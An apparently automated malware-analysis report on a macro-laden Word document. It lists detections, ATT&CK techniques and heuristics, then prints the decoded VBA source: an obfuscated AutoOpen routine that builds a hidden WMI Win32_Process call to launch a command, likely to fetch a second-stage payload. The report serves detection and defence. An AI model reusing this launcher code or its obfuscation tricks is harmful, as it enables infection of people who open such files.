Verdict: MALICIOUS
Risk Score: 302

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The script utilizes GetObject and CreateObject to interact with WMI, specifically launching the Win32_Process to create a new process. The reassembled string 'winmgmts' indicates the use of Windows Management Instrumentation for process creation, likely to download and execute a second-stage payload.
Heuristics (8)

- ClamAV: Doc.Downloader.Smpowloadbb-6962907-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Smpowloadbb-6962907-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 3d640c8c1b157a7346f6c9c16c2149de17913c4d41c8ce1e22469e2d814f60f7) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3808 bytes |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "R_28208"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "U5791469"
Attribute VB_Base = "0{3CA2FA74-431C-4460-A1D5-D1D8DE9CE819}{8386B03A-BF3E-4151-9768-CA8325B461F8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "p880367"
Attribute VB_Name = "f84731"
Attribute VB_Name = "Z25081"
Attribute VB_Base = "0{807A46D2-975D-4935-A153-ACAD9AEA1154}{7ADB22F7-9441-45E1-97C7-28B77B42509E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "f079243"
Function F3349426(k5173977)
While J085542 And 149204088
Wend
While w95_74 And 854454346
Wend
Set F3349426 = CVar(k5173977)
While K305310 And 753979421
Wend
While U395853 And 789322616
Wend
While C46_6148 And 119975422
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While E933054 And 634371450
Wend
While D44328 And 747068456
Wend
Call t744954
While o4_0754 And 631610284
Wend
While L84482 And 137818177
Wend
End Sub
Attribute VB_Name = "H9055_"
Function t744954()
On Error Resume Next
While N_3276 And 12000626
Wend
While q2344450 And 52923854
Wend
While t7513_ And 766056641
Wend
G79_4559 = U5791469.L_859172 + Z25081.z23_02 + U5791469.L_859172.ControlSource + Z25081.Q255481 + U5791469.L_859172.ControlSource + U5791469.L_859172.PasswordChar + Z25081.J722502 + U5791469.L_859172 + U5791469.L_859172.ControlTipText + Z25081.z52_3667 + U5791469.L_859172.PasswordChar + Z25081.Y206_0 + U5791469.L_859172.ControlSource
While E761195 And 635100312
Wend
While c9159133 And 558910165
Wend
Set Z791726 = F3349426(GetObject("win" + "mgmt" + "s:Wi" + "n32_Pr" + "ocess"))
While p1175181 And 437584546
Wend
While F_9659 And 838715886
Wend
Z791726.Create w082615 + G79_4559 + U899993, b1324075, P1_938, z6077_
While M34415 And 362366490
Wend
While t527155 And 103910997
Wend
While j264093 And 454649236
Wend
End Function
Attribute VB_Name = "r33628"
Public Function P1_938()
While k15_0707 And 902055413
Wend
While j943965 And 26656806
Wend
While H059_751 And 372828827
Wend
Set P1_938 = F3349426(GetObject("win" + "mgmt" + "s:Wi" + "n32_Pr" + "ocess" + "S" + "tartup"))
While b__41479 And 622989322
Wend
While X3013_12 And 835013015
Wend
Y1770936 = vbError - vbError
While w60479 And 368350587
Wend
While z199863_ And 702267513
Wend
While Z097229 And 879233403
Wend
With P1_938
While E89865 And 80006309
Wend
While W54965 And 586659777
Wend
. _
ShowWindow = Y1770936 + Y1770936 + Y1770936 + Y1770936 + Y1770936 + Y1770936 + Y1770936
While a8088070 And 308619861
Wend
While Q3131844 And 829662904
Wend
End With
While C_0883 And 491278664
Wend
While Y3920787 And 267610294
Wend
While Y52606 And 77492009
Wend
End Function
```